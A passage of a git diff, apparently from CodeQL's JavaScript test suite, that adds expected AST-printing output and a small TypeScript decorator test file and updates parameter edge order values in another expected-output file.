[ClassInitializedMember,MethodDefinition] operators(): void {} | semmle.label | [ClassInitializedMember,MethodDefinition] operators(): void {} | +| tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | semmle.label | [FunctionExpr] operators(): void {} | +| tst.ts:7:16:7:19 | [KeywordTypeExpr] void | semmle.label | [KeywordTypeExpr] void | +| tst.ts:7:21:7:22 | [BlockStmt] {} | semmle.label | [BlockStmt] {} | +| tst.ts:10:1:10:41 | [DeclStmt] const createMethodDecorator = ... | semmle.label | [DeclStmt] const createMethodDecorator = ... | +| tst.ts:10:1:10:41 | [DeclStmt] const createMethodDecorator = ... | semmle.order | 3 | +| tst.ts:10:7:10:27 | [VarDecl] createMethodDecorator | semmle.label | [VarDecl] createMethodDecorator | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | semmle.label | [VariableDeclarator] createM ... = null | +| tst.ts:10:31:10:33 | [KeywordTypeExpr] any | semmle.label | [KeywordTypeExpr] any | +| tst.ts:10:37:10:40 | [Literal] null | semmle.label | [Literal] null | +| tst.ts:12:1:12:21 | [VarRef] createMethodDecorator | semmle.label | [VarRef] createMethodDecorator | +| tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | semmle.label | [CallExpr] createM ... { }) | +| tst.ts:12:1:14:3 | [ExprStmt] createM ... }); | semmle.label | [ExprStmt] createM ... }); | +| tst.ts:12:1:14:3 | [ExprStmt] createM ... }); | semmle.order | 4 | +| tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | semmle.label | [ArrowFunctionExpr] ({ args ... { } | +| tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | semmle.label | [ObjectPattern,Parameter] { args, context } | +| tst.ts:12:26:12:29 | [Label] args | semmle.label | [Label] args | +| tst.ts:12:26:12:29 | [PropertyPattern] args | semmle.label | [PropertyPattern] args | +| tst.ts:12:26:12:29 | [VarDecl] args | semmle.label | [VarDecl] args | +| tst.ts:12:32:12:38 | [Label] context | semmle.label | [Label] context | +| tst.ts:12:32:12:38 | [PropertyPattern] context | semmle.label | [PropertyPattern] context | +| tst.ts:12:32:12:38 | [VarDecl] context | semmle.label | [VarDecl] context | +| tst.ts:12:43:12:46 | [SimpleParameter] next | semmle.label | [SimpleParameter] next | +| tst.ts:12:52:14:1 | [BlockStmt] { } | semmle.label | [BlockStmt] { } | +edges +| file://:0:0:0:0 | (Arguments) | tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | semmle.label | 0 | +| file://:0:0:0:0 | (Arguments) | tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | semmle.order | 0 | +| file://:0:0:0:0 | (Parameters) | tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | semmle.label | 0 | +| file://:0:0:0:0 | (Parameters) | tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | semmle.order | 0 | +| file://:0:0:0:0 | (Parameters) | tst.ts:12:43:12:46 | [SimpleParameter] next | semmle.label | 1 | +| file://:0:0:0:0 | (Parameters) | tst.ts:12:43:12:46 | [SimpleParameter] next | semmle.order | 1 | +| tst.ts:1:1:1:22 | [DeclStmt] const Dec = ... | tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | semmle.label | 1 | +| tst.ts:1:1:1:22 | [DeclStmt] const Dec = ... | tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | semmle.order | 1 | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | tst.ts:1:7:1:9 | [VarDecl] Dec | semmle.label | 1 | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | tst.ts:1:7:1:9 | [VarDecl] Dec | semmle.order | 1 | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | tst.ts:1:12:1:14 | [KeywordTypeExpr] any | semmle.label | 2 | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | tst.ts:1:12:1:14 | [KeywordTypeExpr] any | semmle.order | 2 | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | tst.ts:1:18:1:21 | [Literal] null | semmle.label | 3 | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | tst.ts:1:18:1:21 | [Literal] null | semmle.order | 3 | +| tst.ts:3:1:3:6 | [Decorator] @Dec() | tst.ts:3:2:3:6 | [CallExpr] Dec() | semmle.label | 1 | +| tst.ts:3:1:3:6 | [Decorator] @Dec() | tst.ts:3:2:3:6 | [CallExpr] Dec() | semmle.order | 1 | +| tst.ts:3:2:3:6 | [CallExpr] Dec() | tst.ts:3:2:3:4 | [VarRef] Dec | semmle.label | 0 | +| tst.ts:3:2:3:6 | [CallExpr] Dec() | tst.ts:3:2:3:4 | [VarRef] Dec | semmle.order | 0 | +| tst.ts:4:1:8:1 | [ExportDeclaration] export ... id {} } | tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | semmle.label | 1 | +| tst.ts:4:1:8:1 | [ExportDeclaration] export ... id {} } | tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | semmle.order | 1 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:3:1:3:6 | [Decorator] @Dec() | semmle.label | 1 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:3:1:3:6 | [Decorator] @Dec() | semmle.order | 1 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:4:14:4:30 | [VarDecl] OperatorResolvers | semmle.label | 2 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:4:14:4:30 | [VarDecl] OperatorResolvers | semmle.order | 2 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | semmle.label | 3 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | semmle.order | 3 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | semmle.label | 4 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | semmle.order | 4 | +| tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | tst.ts:4:32:4:31 | [FunctionExpr] () {} | semmle.label | 2 | +| tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | tst.ts:4:32:4:31 | [FunctionExpr] () {} | semmle.order | 2 | +| tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | tst.ts:4:32:4:31 | [Label] constructor | semmle.label | 1 | +| tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | tst.ts:4:32:4:31 | [Label] constructor | semmle.order | 1 | +| tst.ts:4:32:4:31 | [FunctionExpr] () {} | tst.ts:4:32:4:31 | [BlockStmt] {} | semmle.label | 5 | +| tst.ts:4:32:4:31 | [FunctionExpr] () {} | tst.ts:4:32:4:31 | [BlockStmt] {} | semmle.order | 5 | +| tst.ts:5:3:5:8 | [Decorator] @Dec() | tst.ts:5:4:5:8 | [CallExpr] Dec() | semmle.label | 1 | +| tst.ts:5:3:5:8 | [Decorator] @Dec() | tst.ts:5:4:5:8 | [CallExpr] Dec() | semmle.order | 1 | +| tst.ts:5:4:5:8 | [CallExpr] Dec() | tst.ts:5:4:5:6 | [VarRef] Dec | semmle.label | 0 | +| tst.ts:5:4:5:8 | [CallExpr] Dec() | tst.ts:5:4:5:6 | [VarRef] Dec | semmle.order | 0 | +| tst.ts:6:3:6:8 | [Decorator] @Dec() | tst.ts:6:4:6:8 | [CallExpr] Dec() | semmle.label | 1 | +| tst.ts:6:3:6:8 | [Decorator] @Dec() | tst.ts:6:4:6:8 | [CallExpr] Dec() | semmle.order | 1 | +| tst.ts:6:4:6:8 | [CallExpr] Dec() | tst.ts:6:4:6:6 | [VarRef] Dec | semmle.label | 0 | +| tst.ts:6:4:6:8 | [CallExpr] Dec() | tst.ts:6:4:6:6 | [VarRef] Dec | semmle.order | 0 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:5:3:5:8 | [Decorator] @Dec() | semmle.label | 1 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:5:3:5:8 | [Decorator] @Dec() | semmle.order | 1 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:6:3:6:8 | [Decorator] @Dec() | semmle.label | 2 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:6:3:6:8 | [Decorator] @Dec() | semmle.order | 2 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:7:3:7:11 | [Label] operators | semmle.label | 3 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:7:3:7:11 | [Label] operators | semmle.order | 3 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | semmle.label | 4 | +| tst.ts:7:3:7:22 | [ClassInitializedMember,MethodDefinition] operators(): void {} | tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | semmle.order | 4 | +| tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | tst.ts:7:16:7:19 | [KeywordTypeExpr] void | semmle.label | 4 | +| tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | tst.ts:7:16:7:19 | [KeywordTypeExpr] void | semmle.order | 4 | +| tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | tst.ts:7:21:7:22 | [BlockStmt] {} | semmle.label | 5 | +| tst.ts:7:3:7:22 | [FunctionExpr] operators(): void {} | tst.ts:7:21:7:22 | [BlockStmt] {} | semmle.order | 5 | +| tst.ts:10:1:10:41 | [DeclStmt] const createMethodDecorator = ... | tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | semmle.label | 1 | +| tst.ts:10:1:10:41 | [DeclStmt] const createMethodDecorator = ... | tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | semmle.order | 1 | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | tst.ts:10:7:10:27 | [VarDecl] createMethodDecorator | semmle.label | 1 | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | tst.ts:10:7:10:27 | [VarDecl] createMethodDecorator | semmle.order | 1 | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | tst.ts:10:31:10:33 | [KeywordTypeExpr] any | semmle.label | 2 | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | tst.ts:10:31:10:33 | [KeywordTypeExpr] any | semmle.order | 2 | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | tst.ts:10:37:10:40 | [Literal] null | semmle.label | 3 | +| tst.ts:10:7:10:40 | [VariableDeclarator] createM ... = null | tst.ts:10:37:10:40 | [Literal] null | semmle.order | 3 | +| tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | file://:0:0:0:0 | (Arguments) | semmle.label | 1 | +| tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | file://:0:0:0:0 | (Arguments) | semmle.order | 1 | +| tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | tst.ts:12:1:12:21 | [VarRef] createMethodDecorator | semmle.label | 0 | +| tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | tst.ts:12:1:12:21 | [VarRef] createMethodDecorator | semmle.order | 0 | +| tst.ts:12:1:14:3 | [ExprStmt] createM ... }); | tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | semmle.label | 1 | +| tst.ts:12:1:14:3 | [ExprStmt] createM ... }); | tst.ts:12:1:14:2 | [CallExpr] createM ... { }) | semmle.order | 1 | +| tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | +| tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | +| tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | tst.ts:12:52:14:1 | [BlockStmt] { } | semmle.label | 5 | +| tst.ts:12:23:14:1 | [ArrowFunctionExpr] ({ args ... { } | tst.ts:12:52:14:1 | [BlockStmt] { } | semmle.order | 5 | +| tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | tst.ts:12:26:12:29 | [PropertyPattern] args | semmle.label | 1 | +| tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | tst.ts:12:26:12:29 | [PropertyPattern] args | semmle.order | 1 | +| tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | tst.ts:12:32:12:38 | [PropertyPattern] context | semmle.label | 2 | +| tst.ts:12:24:12:40 | [ObjectPattern,Parameter] { args, context } | tst.ts:12:32:12:38 | [PropertyPattern] context | semmle.order | 2 | +| tst.ts:12:26:12:29 | [PropertyPattern] args | tst.ts:12:26:12:29 | [Label] args | semmle.label | 1 | +| tst.ts:12:26:12:29 | [PropertyPattern] args | tst.ts:12:26:12:29 | [Label] args | semmle.order | 1 | +| tst.ts:12:26:12:29 | [PropertyPattern] args | tst.ts:12:26:12:29 | [VarDecl] args | semmle.label | 2 | +| tst.ts:12:26:12:29 | [PropertyPattern] args | tst.ts:12:26:12:29 | [VarDecl] args | semmle.order | 2 | +| tst.ts:12:32:12:38 | [PropertyPattern] context | tst.ts:12:32:12:38 | [Label] context | semmle.label | 1 | +| tst.ts:12:32:12:38 | [PropertyPattern] context | tst.ts:12:32:12:38 | [Label] context | semmle.order | 1 | +| tst.ts:12:32:12:38 | [PropertyPattern] context | tst.ts:12:32:12:38 | [VarDecl] context | semmle.label | 2 | +| tst.ts:12:32:12:38 | [PropertyPattern] context | tst.ts:12:32:12:38 | [VarDecl] context | semmle.order | 2 | +graphProperties +| semmle.graphKind | tree | diff --git a/javascript/ql/test/library-tests/AST/Decorators/printAst.ql b/javascript/ql/test/library-tests/AST/Decorators/printAst.ql new file mode 100644 index 00000000000..248ea7ad396 --- /dev/null +++ b/javascript/ql/test/library-tests/AST/Decorators/printAst.ql @@ -0,0 +1,2 @@ +import javascript +import semmle.javascript.PrintAst diff --git a/javascript/ql/test/library-tests/AST/Decorators/tsconfig.json b/javascript/ql/test/library-tests/AST/Decorators/tsconfig.json new file mode 100644 index 00000000000..fe851ed6b77 --- /dev/null +++ b/javascript/ql/test/library-tests/AST/Decorators/tsconfig.json @@ -0,0 +1,7 @@ +{ + "compilerOptions": { + "experimentalDecorators": true + }, + "include": ["**/*.ts"], + "lib": ["es2015", "dom"] +} \ No newline at end of file diff --git a/javascript/ql/test/library-tests/AST/Decorators/tst.ts b/javascript/ql/test/library-tests/AST/Decorators/tst.ts new file mode 100644 index 00000000000..f56ff5ed52d --- /dev/null +++ b/javascript/ql/test/library-tests/AST/Decorators/tst.ts @@ -0,0 +1,14 @@ +const Dec: any = null; + +@Dec() +export class OperatorResolvers { + @Dec() + @Dec() + operators(): void {} +} + +const createMethodDecorator : any = null; + +createMethodDecorator(({ args, context }, next) => { + +}); \ No newline at end of file diff --git a/javascript/ql/test/library-tests/TypeScript/TypeAnnotations/printAst.expected b/javascript/ql/test/library-tests/TypeScript/TypeAnnotations/printAst.expected index 5a429553e69..32f8fa2bf31 100644 --- a/javascript/ql/test/library-tests/TypeScript/TypeAnnotations/printAst.expected +++ b/javascript/ql/test/library-tests/TypeScript/TypeAnnotations/printAst.expected @@ -1292,16 +1292,16 @@ edges | tst.ts:24:3:24:46 | [MethodSignature] takeNum ... umber); | tst.ts:24:3:24:18 | [Label] takeNumberMethod | semmle.order | 1 | | tst.ts:24:3:24:46 | [MethodSignature] takeNum ... umber); | tst.ts:24:3:24:46 | [FunctionExpr] takeNum ... umber); | semmle.label | 2 | | tst.ts:24:3:24:46 | [MethodSignature] takeNum ... umber); | tst.ts:24:3:24:46 | [FunctionExpr] takeNum ... umber); | semmle.order | 2 | -| tst.ts:24:20:24:36 | [SimpleParameter] numberMethodParam | tst.ts:24:39:24:44 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:24:20:24:36 | [SimpleParameter] numberMethodParam | tst.ts:24:39:24:44 | [KeywordTypeExpr] number | semmle.order | 0 | +| tst.ts:24:20:24:36 | [SimpleParameter] numberMethodParam | tst.ts:24:39:24:44 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:24:20:24:36 | [SimpleParameter] numberMethodParam | tst.ts:24:39:24:44 | [KeywordTypeExpr] number | semmle.order | -2 | | tst.ts:25:3:25:55 | [FunctionExpr] takeInt ... rface); | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | | tst.ts:25:3:25:55 | [FunctionExpr] takeInt ... rface); | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:25:3:25:55 | [MethodSignature] takeInt ... rface); | tst.ts:25:3:25:21 | [Label] takeInterfaceMethod | semmle.label | 1 | | tst.ts:25:3:25:55 | [MethodSignature] takeInt ... rface); | tst.ts:25:3:25:21 | [Label] takeInterfaceMethod | semmle.order | 1 | | tst.ts:25:3:25:55 | [MethodSignature] takeInt ... rface); | tst.ts:25:3:25:55 | [FunctionExpr] takeInt ... rface); | semmle.label | 2 | | tst.ts:25:3:25:55 | [MethodSignature] takeInt ... rface); | tst.ts:25:3:25:55 | [FunctionExpr] takeInt ... rface); | semmle.order | 2 | -| tst.ts:25:23:25:42 | [SimpleParameter] interfaceMethodParam | tst.ts:25:45:25:53 | [LocalTypeAccess] Interface | semmle.label | 0 | -| tst.ts:25:23:25:42 | [SimpleParameter] interfaceMethodParam | tst.ts:25:45:25:53 | [LocalTypeAccess] Interface | semmle.order | 0 | +| tst.ts:25:23:25:42 | [SimpleParameter] interfaceMethodParam | tst.ts:25:45:25:53 | [LocalTypeAccess] Interface | semmle.label | -2 | +| tst.ts:25:23:25:42 | [SimpleParameter] interfaceMethodParam | tst.ts:25:45:25:53 | [LocalTypeAccess] Interface | semmle.order | -2 | | tst.ts:28:1:28:28 | [DeclStmt] var interfaceVar = ... | tst.ts:28:5:28:27 | [VariableDeclarator] interfa ... terface | semmle.label | 1 | | tst.ts:28:1:28:28 | [DeclStmt] var interfaceVar = ... | tst.ts:28:5:28:27 | [VariableDeclarator] interfa ... terface | semmle.order | 1 | | tst.ts:28:5:28:27 | [VariableDeclarator] interfa ... terface | tst.ts:28:5:28:16 | [VarDecl] interfaceVar | semmle.label | 1 | @@ -1344,30 +1344,30 @@ edges | tst.ts:33:1:33:59 | [FunctionDeclStmt] functio ... ber) {} | tst.ts:33:10:33:27 | [VarDecl] takeNumberFunction | semmle.order | 0 | | tst.ts:33:1:33:59 | [FunctionDeclStmt] functio ... ber) {} | tst.ts:33:58:33:59 | [BlockStmt] {} | semmle.label | 5 | | tst.ts:33:1:33:59 | [FunctionDeclStmt] functio ... ber) {} | tst.ts:33:58:33:59 | [BlockStmt] {} | semmle.order | 5 | -| tst.ts:33:29:33:47 | [SimpleParameter] numberFunctionParam | tst.ts:33:50:33:55 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:33:29:33:47 | [SimpleParameter] numberFunctionParam | tst.ts:33:50:33:55 | [KeywordTypeExpr] number | semmle.order | 0 | +| tst.ts:33:29:33:47 | [SimpleParameter] numberFunctionParam | tst.ts:33:50:33:55 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:33:29:33:47 | [SimpleParameter] numberFunctionParam | tst.ts:33:50:33:55 | [KeywordTypeExpr] number | semmle.order | -2 | | tst.ts:34:1:34:67 | [FunctionDeclStmt] functio ... ace) {} | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | | tst.ts:34:1:34:67 | [FunctionDeclStmt] functio ... ace) {} | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:34:1:34:67 | [FunctionDeclStmt] functio ... ace) {} | tst.ts:34:10:34:30 | [VarDecl] takeInterfaceFunction | semmle.label | 0 | | tst.ts:34:1:34:67 | [FunctionDeclStmt] functio ... ace) {} | tst.ts:34:10:34:30 | [VarDecl] takeInterfaceFunction | semmle.order | 0 | | tst.ts:34:1:34:67 | [FunctionDeclStmt] functio ... ace) {} | tst.ts:34:66:34:67 | [BlockStmt] {} | semmle.label | 5 | | tst.ts:34:1:34:67 | [FunctionDeclStmt] functio ... ace) {} | tst.ts:34:66:34:67 | [BlockStmt] {} | semmle.order | 5 | -| tst.ts:34:32:34:52 | [SimpleParameter] interaceFunctionParam | tst.ts:34:55:34:63 | [LocalTypeAccess] Interface | semmle.label | 0 | -| tst.ts:34:32:34:52 | [SimpleParameter] interaceFunctionParam | tst.ts:34:55:34:63 | [LocalTypeAccess] Interface | semmle.order | 0 | +| tst.ts:34:32:34:52 | [SimpleParameter] interaceFunctionParam | tst.ts:34:55:34:63 | [LocalTypeAccess] Interface | semmle.label | -2 | +| tst.ts:34:32:34:52 | [SimpleParameter] interaceFunctionParam | tst.ts:34:55:34:63 | [LocalTypeAccess] Interface | semmle.order | -2 | | tst.ts:36:1:36:70 | [FunctionDeclStmt] functio ... '2') {} | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | | tst.ts:36:1:36:70 | [FunctionDeclStmt] functio ... '2') {} | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:36:1:36:70 | [FunctionDeclStmt] functio ... '2') {} | tst.ts:36:10:36:25 | [VarDecl] typesAndDefaults | semmle.label | 0 | | tst.ts:36:1:36:70 | [FunctionDeclStmt] functio ... '2') {} | tst.ts:36:10:36:25 | [VarDecl] typesAndDefaults | semmle.order | 0 | | tst.ts:36:1:36:70 | [FunctionDeclStmt] functio ... '2') {} | tst.ts:36:69:36:70 | [BlockStmt] {} | semmle.label | 5 | | tst.ts:36:1:36:70 | [FunctionDeclStmt] functio ... '2') {} | tst.ts:36:69:36:70 | [BlockStmt] {} | semmle.order | 5 | -| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:35:36:40 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:35:36:40 | [KeywordTypeExpr] number | semmle.order | 0 | -| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:44:36:44 | [Literal] 1 | semmle.label | 1 | -| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:44:36:44 | [Literal] 1 | semmle.order | 1 | -| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:55:36:60 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:55:36:60 | [KeywordTypeExpr] string | semmle.order | 0 | -| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:64:36:66 | [Literal] '2' | semmle.label | 1 | -| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:64:36:66 | [Literal] '2' | semmle.order | 1 | +| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:35:36:40 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:35:36:40 | [KeywordTypeExpr] number | semmle.order | -2 | +| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:44:36:44 | [Literal] 1 | semmle.label | -1 | +| tst.ts:36:27:36:32 | [SimpleParameter] param1 | tst.ts:36:44:36:44 | [Literal] 1 | semmle.order | -1 | +| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:55:36:60 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:55:36:60 | [KeywordTypeExpr] string | semmle.order | -2 | +| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:64:36:66 | [Literal] '2' | semmle.label | -1 | +| tst.ts:36:47:36:52 | [SimpleParameter] param2 | tst.ts:36:64:36:66 | [Literal] '2' | semmle.order | -1 | | tst.ts:38:1:38:23 | [DeclStmt] var arrayType = ... | tst.ts:38:5:38:23 | [VariableDeclarator] arrayType: string[] | semmle.label | 1 | | tst.ts:38:1:38:23 | [DeclStmt] var arrayType = ... | tst.ts:38:5:38:23 | [VariableDeclarator] arrayType: string[] | semmle.order | 1 | | tst.ts:38:5:38:23 | [VariableDeclarator] arrayType: string[] | tst.ts:38:5:38:13 | [VarDecl] arrayType | semmle.label | 1 | @@ -1734,8 +1734,8 @@ edges | tst.ts:80:1:80:73 | [FunctionDeclStmt] functio ... alse; } | tst.ts:80:36:80:55 | [IsTypeExpr] x is Generic | semmle.order | 4 | | tst.ts:80:1:80:73 | [FunctionDeclStmt] functio ... alse; } | tst.ts:80:57:80:73 | [BlockStmt] { return false; } | semmle.label | 5 | | tst.ts:80:1:80:73 | [FunctionDeclStmt] functio ... alse; } | tst.ts:80:57:80:73 | [BlockStmt] { return false; } | semmle.order | 5 | -| tst.ts:80:24:80:24 | [SimpleParameter] x | tst.ts:80:27:80:32 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:80:24:80:24 | [SimpleParameter] x | tst.ts:80:27:80:32 | [KeywordTypeExpr] number | semmle.order | 0 | +| tst.ts:80:24:80:24 | [SimpleParameter] x | tst.ts:80:27:80:32 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:80:24:80:24 | [SimpleParameter] x | tst.ts:80:27:80:32 | [KeywordTypeExpr] number | semmle.order | -2 | | tst.ts:80:36:80:55 | [IsTypeExpr] x is Generic | tst.ts:80:36:80:36 | [LocalVarTypeAccess] x | semmle.label | 1 | | tst.ts:80:36:80:55 | [IsTypeExpr] x is Generic | tst.ts:80:36:80:36 | [LocalVarTypeAccess] x | semmle.order | 1 | | tst.ts:80:36:80:55 | [IsTypeExpr] x is Generic | tst.ts:80:41:80:55 | [GenericTypeExpr] Generic | semmle.label | 2 | @@ -1758,8 +1758,8 @@ edges | tst.ts:81:1:81:66 | [FunctionDeclStmt] functio ... true } | tst.ts:81:38:81:50 | [IsTypeExpr] x is typeof x | semmle.order | 4 | | tst.ts:81:1:81:66 | [FunctionDeclStmt] functio ... true } | tst.ts:81:52:81:66 | [BlockStmt] { return true } | semmle.label | 5 | | tst.ts:81:1:81:66 | [FunctionDeclStmt] functio ... true } | tst.ts:81:52:81:66 | [BlockStmt] { return true } | semmle.order | 5 | -| tst.ts:81:24:81:24 | [SimpleParameter] x | tst.ts:81:27:81:34 | [ArrayTypeExpr] string[] | semmle.label | 0 | -| tst.ts:81:24:81:24 | [SimpleParameter] x | tst.ts:81:27:81:34 | [ArrayTypeExpr] string[] | semmle.order | 0 | +| tst.ts:81:24:81:24 | [SimpleParameter] x | tst.ts:81:27:81:34 | [ArrayTypeExpr] string[] | semmle.label | -2 | +| tst.ts:81:24:81:24 | [SimpleParameter] x | tst.ts:81:27:81:34 | [ArrayTypeExpr] string[] | semmle.order | -2 | | tst.ts:81:27:81:34 | [ArrayTypeExpr] string[] | tst.ts:81:27:81:32 | [KeywordTypeExpr] string | semmle.label | 1 | | tst.ts:81:27:81:34 | [ArrayTypeExpr] string[] | tst.ts:81:27:81:32 | [KeywordTypeExpr] string | semmle.order | 1 | | tst.ts:81:38:81:50 | [IsTypeExpr] x is typeof x | tst.ts:81:38:81:38 | [LocalVarTypeAccess] x | semmle.label | 1 | @@ -1832,8 +1832,8 @@ edges | tst.ts:88:20:88:44 | [FunctionExpr] (param: ... number | tst.ts:88:39:88:44 | [KeywordTypeExpr] number | semmle.order | 4 | | tst.ts:88:20:88:44 | [FunctionTypeExpr] (param: ... number | tst.ts:88:20:88:44 | [FunctionExpr] (param: ... number | semmle.label | 1 | | tst.ts:88:20:88:44 | [FunctionTypeExpr] (param: ... number | tst.ts:88:20:88:44 | [FunctionExpr] (param: ... number | semmle.order | 1 | -| tst.ts:88:21:88:25 | [SimpleParameter] param | tst.ts:88:28:88:33 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:88:21:88:25 | [SimpleParameter] param | tst.ts:88:28:88:33 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:88:21:88:25 | [SimpleParameter] param | tst.ts:88:28:88:33 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:88:21:88:25 | [SimpleParameter] param | tst.ts:88:28:88:33 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:89:1:89:38 | [DeclStmt] var functionType3 = ... | tst.ts:89:5:89:37 | [VariableDeclarator] functio ... T) => T | semmle.label | 1 | | tst.ts:89:1:89:38 | [DeclStmt] var functionType3 = ... | tst.ts:89:5:89:37 | [VariableDeclarator] functio ... T) => T | semmle.order | 1 | | tst.ts:89:5:89:37 | [VariableDeclarator] functio ... T) => T | tst.ts:89:5:89:17 | [VarDecl] functionType3 | semmle.label | 1 | @@ -1850,8 +1850,8 @@ edges | tst.ts:89:20:89:37 | [FunctionTypeExpr] (param: T) => T | tst.ts:89:20:89:37 | [FunctionExpr] (param: T) => T | semmle.order | 1 | | tst.ts:89:21:89:21 | [TypeParameter] T | tst.ts:89:21:89:21 | [Identifier] T | semmle.label | 1 | | tst.ts:89:21:89:21 | [TypeParameter] T | 